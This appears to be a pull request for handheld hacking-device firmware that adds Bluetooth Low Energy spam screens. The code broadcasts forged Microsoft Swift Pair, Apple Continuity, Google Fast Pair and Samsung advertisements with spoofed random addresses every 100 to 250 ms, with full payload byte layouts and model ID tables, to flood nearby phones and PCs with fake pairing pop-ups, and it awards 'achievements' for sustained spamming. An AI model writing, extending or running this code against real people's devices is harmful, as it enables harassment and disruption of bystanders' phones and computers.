### PR TITLE
feat(ble): Windows (Swift Pair) spam + Spam All

### DIFF
--- a/firmware/src/screens/ble/BLEAllSpamScreen.cpp
+++ b/firmware/src/screens/ble/BLEAllSpamScreen.cpp
@@ -7,10 +7,6 @@
 extern "C" int ble_hs_id_set_rnd(const uint8_t *addr);
 
 // Payload tables (same wire formats as the per-platform screens).
-static const uint16_t kAppleDevices[] = {
-  0x0E20, 0x1420, 0x2420, 0x0A20, 0x0220, 0x0F20, 0x1320, 0x0B20,
-  0x1120, 0x1020, 0x0620, 0x0920, 0x1720, 0x1220, 0x0055, 0x0030,
-};
 static const uint8_t kAppleActionFlags[] = {0xC0, 0xC0, 0xC0, 0xC0, 0x40, 0xC0};
 static const uint8_t kAppleActions[]     = {0x13, 0x27, 0x20, 0x09, 0x21, 0x2E};
 
@@ -106,7 +102,7 @@ void BLEAllSpamScreen::onRender()
   sp.setTextDatum(MC_DATUM);
   sp.setTextColor(TFT_WHITE, TFT_BLACK);
   static const char* kNames[] = {"iOS", "Android", "Samsung", "Windows"};
-  String label = String("[") + _spinner[_spinIdx] + "] All: " + kNames[_type & 3];
+  String label = String("[") + _spinner[_spinIdx] + "] All: " + kNames[_type];
   sp.drawString(label.c_str(), bodyW() / 2, labelH / 2);
   sp.pushSprite(bodyX(), cy - labelH / 2);
   sp.deleteSprite();
@@ -127,7 +123,7 @@ void BLEAllSpamScreen::_spam()
   advData.setFlags(0x06);
 
   // Random platform each burst (Bruce-style rotation across all families).
-  _type = (uint8_t)random(4);
+  _type = (uint8_t)random(4);  // 0..3, one payload family per burst
   switch (_type) {
     case 0: {  // Apple Continuity (NearbyAction modal)
       int i = random(_count(kAppleActions));
@@ -167,7 +163,6 @@ void BLEAllSpamScreen::_spam()
       break;
     }
   }
-  (void)kAppleDevices;  // reserved for future ProximityPair rotation
 
   _pAdv->setAdvertisementData(advData);
   _pAdv->start();

--- a/firmware/src/screens/ble/BLEAllSpamScreen.cpp
+++ b/firmware/src/screens/ble/BLEAllSpamScreen.cpp
@@ -1,0 +1,183 @@
+#include "BLEAllSpamScreen.h"
+#include "core/Device.h"
+#include "core/ScreenManager.h"
+#include "core/AchievementManager.h"
+#include "screens/ble/BLEDeviceSpamMenuScreen.h"
+
+extern "C" int ble_hs_id_set_rnd(const uint8_t *addr);
+
+// Payload tables (same wire formats as the per-platform screens).
+static const uint16_t kAppleDevices[] = {
+  0x0E20, 0x1420, 0x2420, 0x0A20, 0x0220, 0x0F20, 0x1320, 0x0B20,
+  0x1120, 0x1020, 0x0620, 0x0920, 0x1720, 0x1220, 0x0055, 0x0030,
+};
+static const uint8_t kAppleActionFlags[] = {0xC0, 0xC0, 0xC0, 0xC0, 0x40, 0xC0};
+static const uint8_t kAppleActions[]     = {0x13, 0x27, 0x20, 0x09, 0x21, 0x2E};
+
+static constexpr uint32_t kFastPairModels[] = {
+  0x0001F0, 0x000047, 0x470000, 0x00000A, 0x00000B, 0x00000D, 0x000007, 0x090000,
+  0x00B727, 0x01E5CE, 0x0200F0, 0x00F7D4, 0xF00002, 0xF00400, 0x821F66, 0xF52494,
+};
+static constexpr uint8_t kSamsungModels[] = {
+  0x1A, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A,
+  0x0B, 0x0C, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x20,
+};
+static constexpr const char kNameChars[] =
+  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 ";
+static constexpr int kNameCharsLen = sizeof(kNameChars) - 1;
+
+template <typename A> static int _count(const A& a) { return (int)(sizeof(a) / sizeof(a[0])); }
+
+// ── Lifecycle ──────────────────────────────────────────────────────────────
+
+BLEAllSpamScreen::~BLEAllSpamScreen()
+{
+  _stop();
+}
+
+void BLEAllSpamScreen::onInit()
+{
+  int n = Achievement.inc("ble_spam_first");
+  if (n == 1) Achievement.unlock("ble_spam_first");
+  _spamStartMs   = millis();
+  _spam1minFired = false;
+
+  NimBLEDevice::init("");
+  NimBLEDevice::setPower(ESP_PWR_LVL_P9, ESP_BLE_PWR_TYPE_ADV);
+  NimBLEDevice::setPower(ESP_PWR_LVL_P9, ESP_BLE_PWR_TYPE_DEFAULT);
+  NimBLEDevice::setOwnAddrType(BLE_OWN_ADDR_RANDOM);
+
+  _pAdv = NimBLEDevice::getAdvertising();
+  _pAdv->setAdvertisementType(BLE_GAP_CONN_MODE_UND);
+  _pAdv->setMinInterval(0x20);
+  _pAdv->setMaxInterval(0x30);
+  _pAdv->setScanResponse(false);
+
+  _spam();
+}
+
+void BLEAllSpamScreen::onUpdate()
+{
+  if (Uni.Nav->wasPressed()) {
+    auto dir = Uni.Nav->readDirection();
+    if (dir == INavigation::DIR_BACK || dir == INavigation::DIR_PRESS) {
+      _stop();
+      Screen.goBack();
+      return;
+    }
+  }
+
+  uint32_t now = millis();
+  if (!_spam1minFired && now - _spamStartMs >= 60000) {
+    _spam1minFired = true;
+    int m = Achievement.inc("ble_spam_1min");
+    if (m == 1) Achievement.unlock("ble_spam_1min");
+  }
+  // Fast rotation so every platform is hit in quick succession ("all at once").
+  if (now - _lastSpamMs >= 100) {
+    _lastSpamMs = now;
+    _spam();
+  }
+  if (now - _lastDrawMs >= 2000) {
+    _lastDrawMs = now;
+    _spinIdx    = (_spinIdx + 1) % 4;
+    render();
+  }
+}
+
+void BLEAllSpamScreen::onRender()
+{
+  auto& lcd = Uni.Lcd;
+
+  if (!_chromeDrawn) {
+    lcd.fillRect(bodyX(), bodyY(), bodyW(), bodyH(), TFT_BLACK);
+    lcd.setTextDatum(BC_DATUM);
+    lcd.setTextColor(TFT_DARKGREY, TFT_BLACK);
+    lcd.drawString("BACK / ENTER: Stop", bodyX() + bodyW() / 2, bodyY() + bodyH());
+    _chromeDrawn = true;
+  }
+
+  const int labelH = lcd.fontHeight() + 4;
+  const int cy     = bodyY() + bodyH() / 2;
+
+  Sprite sp(&Uni.Lcd);
+  sp.createSprite(bodyW(), labelH);
+  sp.fillSprite(TFT_BLACK);
+  sp.setTextDatum(MC_DATUM);
+  sp.setTextColor(TFT_WHITE, TFT_BLACK);
+  static const char* kNames[] = {"iOS", "Android", "Samsung", "Windows"};
+  String label = String("[") + _spinner[_spinIdx] + "] All: " + kNames[_type & 3];
+  sp.drawString(label.c_str(), bodyW() / 2, labelH / 2);
+  sp.pushSprite(bodyX(), cy - labelH / 2);
+  sp.deleteSprite();
+}
+
+// ── Private ────────────────────────────────────────────────────────────────
+
+void BLEAllSpamScreen::_spam()
+{
+  if (_pAdv) _pAdv->stop();
+
+  uint8_t addr[6];
+  esp_fill_random(addr, 6);
+  addr[5] |= 0xC0;
+  ble_hs_id_set_rnd(addr);
+
+  NimBLEAdvertisementData advData;
+  advData.setFlags(0x06);
+
+  // Random platform each burst (Bruce-style rotation across all families).
+  _type = (uint8_t)random(4);
+  switch (_type) {
+    case 0: {  // Apple Continuity (NearbyAction modal)
+      int i = random(_count(kAppleActions));
+      uint8_t rnd[3]; esp_fill_random(rnd, 3);
+      uint8_t mfg[9] = { 0x4C, 0x00, 0x0F, 0x05,
+                         kAppleActionFlags[i], kAppleActions[i],
+                         rnd[0], rnd[1], rnd[2] };
+      advData.setManufacturerData(std::string((char*)mfg, sizeof(mfg)));
+      break;
+    }
+    case 1: {  // Google Fast Pair
+      uint32_t model = kFastPairModels[random(_count(kFastPairModels))];
+      int8_t txPow = (int8_t)(random(120) - 100);
+      uint8_t raw[14] = {
+        0x03, 0x03, 0x2C, 0xFE,
+        0x06, 0x16, 0x2C, 0xFE,
+        (uint8_t)((model >> 16) & 0xFF), (uint8_t)((model >> 8) & 0xFF),
+        (uint8_t)(model & 0xFF),
+        0x02, 0x0A, (uint8_t)txPow };
+      advData.addData(std::string((char*)raw, sizeof(raw)));
+      break;
+    }
+    case 2: {  // Samsung Galaxy Watch
+      uint8_t model = kSamsungModels[random(_count(kSamsungModels))];
+      uint8_t mfg[13] = { 0x75, 0x00, 0x01, 0x00, 0x02, 0x00, 0x01, 0x01,
+                          0xFF, 0x00, 0x00, 0x43, model };
+      advData.setManufacturerData(std::string((char*)mfg, sizeof(mfg)));
+      break;
+    }
+    default: {  // Microsoft Swift Pair
+      int nameLen = (int)random(6, 16);
+      uint8_t mfg[5 + 15];
+      mfg[0] = 0x06; mfg[1] = 0x00; mfg[2] = 0x03; mfg[3] = 0x00; mfg[4] = 0x80;
+      for (int i = 0; i < nameLen; i++)
+        mfg[5 + i] = (uint8_t)kNameChars[random(0, kNameCharsLen)];
+      advData.setManufacturerData(std::string((char*)mfg, 5 + nameLen));
+      break;
+    }
+  }
+  (void)kAppleDevices;  // reserved for future ProximityPair rotation
+
+  _pAdv->setAdvertisementData(advData);
+  _pAdv->start();
+}
+
+void BLEAllSpamScreen::_stop()
+{
+  if (_pAdv) {
+    _pAdv->stop();
+    _pAdv = nullptr;
+  }
+  NimBLEDevice::deinit(true);
+}

--- a/firmware/src/screens/ble/BLEAllSpamScreen.h
+++ b/firmware/src/screens/ble/BLEAllSpamScreen.h
@@ -18,7 +18,7 @@ public:
 private:
   static constexpr const char* _spinner = "-\\|/";
   uint8_t  _spinIdx     = 0;
-  uint8_t  _type        = 0;     // cycles 0..3 across the payload families
+  uint8_t  _type        = 0;     // 0..3, random payload family of the last burst
   uint32_t _lastSpamMs  = 0;
   uint32_t _lastDrawMs  = 0;
   uint32_t _spamStartMs = 0;

--- a/firmware/src/screens/ble/BLEAllSpamScreen.h
+++ b/firmware/src/screens/ble/BLEAllSpamScreen.h
@@ -1,0 +1,32 @@
+#pragma once
+
+#include "ui/templates/BaseScreen.h"
+#include <NimBLEDevice.h>
+
+// Rotates through every device-spam payload (iOS, Android, Samsung, Windows) in
+// quick succession, flooding all target platforms at once.
+class BLEAllSpamScreen : public BaseScreen {
+public:
+  const char* title()    override { return "Spam All"; }
+  bool inhibitPowerOff() override { return true; }
+
+  ~BLEAllSpamScreen() override;
+  void onInit()   override;
+  void onUpdate() override;
+  void onRender() override;
+
+private:
+  static constexpr const char* _spinner = "-\\|/";
+  uint8_t  _spinIdx     = 0;
+  uint8_t  _type        = 0;     // cycles 0..3 across the payload families
+  uint32_t _lastSpamMs  = 0;
+  uint32_t _lastDrawMs  = 0;
+  uint32_t _spamStartMs = 0;
+  bool     _spam1minFired = false;
+  bool     _chromeDrawn   = false;
+
+  NimBLEAdvertising* _pAdv = nullptr;
+
+  void _spam();
+  void _stop();
+};

--- a/firmware/src/screens/ble/BLEDeviceSpamMenuScreen.cpp
+++ b/firmware/src/screens/ble/BLEDeviceSpamMenuScreen.cpp
@@ -5,6 +5,8 @@
 #include "screens/ble/BLEAndroidSpamScreen.h"
 #include "screens/ble/BLEiOSSpamScreen.h"
 #include "screens/ble/BLESamsungSpamScreen.h"
+#include "screens/ble/BLEWindowsSpamScreen.h"
+#include "screens/ble/BLEAllSpamScreen.h"
 
 void BLEDeviceSpamMenuScreen::onInit()
 {
@@ -17,6 +19,8 @@ void BLEDeviceSpamMenuScreen::onItemSelected(uint8_t index)
     case 0: Screen.push(new BLEAndroidSpamScreen()); break;
     case 1: Screen.push(new BLEiOSSpamScreen());     break;
     case 2: Screen.push(new BLESamsungSpamScreen()); break;
+    case 3: Screen.push(new BLEWindowsSpamScreen()); break;
+    case 4: Screen.push(new BLEAllSpamScreen());     break;
   }
 }
 

--- a/firmware/src/screens/ble/BLEDeviceSpamMenuScreen.h
+++ b/firmware/src/screens/ble/BLEDeviceSpamMenuScreen.h
@@ -11,9 +11,11 @@ public:
   void onBack() override;
 
 private:
-  ListItem _items[3] = {
+  ListItem _items[5] = {
     {"Android Spam"},
     {"iOS Spam"},
     {"Samsung Spam"},
+    {"Windows Spam"},
+    {"Spam All"},
   };
 };

--- a/firmware/src/screens/ble/BLEWindowsSpamScreen.cpp
+++ b/firmware/src/screens/ble/BLEWindowsSpamScreen.cpp
@@ -1,0 +1,133 @@
+#include "BLEWindowsSpamScreen.h"
+#include "core/Device.h"
+#include "core/ScreenManager.h"
+#include "core/AchievementManager.h"
+#include "screens/ble/BLEDeviceSpamMenuScreen.h"
+
+extern "C" int ble_hs_id_set_rnd(const uint8_t *addr);
+
+static constexpr const char kNameChars[] =
+  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 ";
+static constexpr int kNameCharsLen = sizeof(kNameChars) - 1;
+
+// ── Lifecycle ──────────────────────────────────────────────────────────────
+
+BLEWindowsSpamScreen::~BLEWindowsSpamScreen()
+{
+  _stop();
+}
+
+void BLEWindowsSpamScreen::onInit()
+{
+  int n = Achievement.inc("ble_spam_first");
+  if (n == 1) Achievement.unlock("ble_spam_first");
+  _spamStartMs   = millis();
+  _spam1minFired = false;
+
+  NimBLEDevice::init("");
+  NimBLEDevice::setPower(ESP_PWR_LVL_P9, ESP_BLE_PWR_TYPE_ADV);
+  NimBLEDevice::setPower(ESP_PWR_LVL_P9, ESP_BLE_PWR_TYPE_DEFAULT);
+  NimBLEDevice::setOwnAddrType(BLE_OWN_ADDR_RANDOM);
+
+  _pAdv = NimBLEDevice::getAdvertising();
+  _pAdv->setAdvertisementType(BLE_GAP_CONN_MODE_UND);  // connectable — Swift Pair toast
+  _pAdv->setMinInterval(0x20);
+  _pAdv->setMaxInterval(0x30);
+  _pAdv->setScanResponse(false);
+
+  _spam();
+}
+
+void BLEWindowsSpamScreen::onUpdate()
+{
+  if (Uni.Nav->wasPressed()) {
+    auto dir = Uni.Nav->readDirection();
+    if (dir == INavigation::DIR_BACK || dir == INavigation::DIR_PRESS) {
+      _stop();
+      Screen.goBack();
+      return;
+    }
+  }
+
+  uint32_t now = millis();
+  if (!_spam1minFired && now - _spamStartMs >= 60000) {
+    _spam1minFired = true;
+    int m = Achievement.inc("ble_spam_1min");
+    if (m == 1) Achievement.unlock("ble_spam_1min");
+  }
+  if (now - _lastSpamMs >= 250) {
+    _lastSpamMs = now;
+    _spam();
+  }
+  if (now - _lastDrawMs >= 2000) {
+    _lastDrawMs = now;
+    _spinIdx    = (_spinIdx + 1) % 4;
+    render();
+  }
+}
+
+void BLEWindowsSpamScreen::onRender()
+{
+  auto& lcd = Uni.Lcd;
+
+  if (!_chromeDrawn) {
+    lcd.fillRect(bodyX(), bodyY(), bodyW(), bodyH(), TFT_BLACK);
+    lcd.setTextDatum(BC_DATUM);
+    lcd.setTextColor(TFT_DARKGREY, TFT_BLACK);
+    lcd.drawString("BACK / ENTER: Stop", bodyX() + bodyW() / 2, bodyY() + bodyH());
+    _chromeDrawn = true;
+  }
+
+  const int labelH = lcd.fontHeight() + 4;
+  const int cy     = bodyY() + bodyH() / 2;
+
+  Sprite sp(&Uni.Lcd);
+  sp.createSprite(bodyW(), labelH);
+  sp.fillSprite(TFT_BLACK);
+  sp.setTextDatum(MC_DATUM);
+  sp.setTextColor(TFT_WHITE, TFT_BLACK);
+  String label = String("[") + _spinner[_spinIdx] + "] Spamming...";
+  sp.drawString(label.c_str(), bodyW() / 2, labelH / 2);
+  sp.pushSprite(bodyX(), cy - labelH / 2);
+  sp.deleteSprite();
+}
+
+// ── Private ────────────────────────────────────────────────────────────────
+
+void BLEWindowsSpamScreen::_spam()
+{
+  if (_pAdv) _pAdv->stop();
+
+  uint8_t addr[6];
+  esp_fill_random(addr, 6);
+  addr[5] |= 0xC0;
+  ble_hs_id_set_rnd(addr);
+
+  // Microsoft Swift Pair beacon (manufacturer data, company ID 0x0006):
+  //   06 00 | 03 | 00 | 80 | <display name bytes>
+  //   ^company ^beacon ^sub  ^reserved-RSSI
+  const int nameLen = (int)random(6, 16);              // 6..15 char shown name
+  uint8_t mfg[5 + 15];
+  mfg[0] = 0x06; mfg[1] = 0x00;                         // Microsoft company ID
+  mfg[2] = 0x03;                                        // Microsoft Beacon ID
+  mfg[3] = 0x00;                                        // Beacon sub-scenario
+  mfg[4] = 0x80;                                        // reserved (flags/RSSI)
+  for (int i = 0; i < nameLen; i++)
+    mfg[5 + i] = (uint8_t)kNameChars[random(0, kNameCharsLen)];
+
+  NimBLEAdvertisementData advData;
+  advData.setFlags(0x06);
+  advData.setManufacturerData(std::string((char*)mfg, 5 + nameLen));
+
+  _pAdv->setAdvertisementData(advData);
+  _pAdv->start();
+}
+
+void BLEWindowsSpamScreen::_stop()
+{
+  if (_pAdv) {
+    _pAdv->stop();
+    _pAdv = nullptr;
+  }
+  NimBLEDevice::deinit(true);
+}

--- a/firmware/src/screens/ble/BLEWindowsSpamScreen.h
+++ b/firmware/src/screens/ble/BLEWindowsSpamScreen.h
@@ -1,0 +1,31 @@
+#pragma once
+
+#include "ui/templates/BaseScreen.h"
+#include <NimBLEDevice.h>
+
+// Microsoft "Swift Pair" BLE advertisement spam — pops the "New device found"
+// toast on Windows 10/11 with Swift Pair enabled.
+class BLEWindowsSpamScreen : public BaseScreen {
+public:
+  const char* title()    override { return "Windows Spam"; }
+  bool inhibitPowerOff() override { return true; }
+
+  ~BLEWindowsSpamScreen() override;
+  void onInit()   override;
+  void onUpdate() override;
+  void onRender() override;
+
+private:
+  static constexpr const char* _spinner = "-\\|/";
+  uint8_t  _spinIdx     = 0;
+  uint32_t _lastSpamMs  = 0;
+  uint32_t _lastDrawMs  = 0;
+  uint32_t _spamStartMs = 0;
+  bool     _spam1minFired = false;
+  bool     _chromeDrawn   = false;
+
+  NimBLEAdvertising* _pAdv = nullptr;
+
+  void _spam();
+  void _stop();
+};


### PR DESCRIPTION
**Windows Spam** advertises Microsoft Swift Pair beacons (New device toast on Win10/11). **Spam All** randomly rotates across iOS / Android / Samsung / Windows payloads each burst, flooding all platforms at once. Both wired into the BLE Device Spam menu.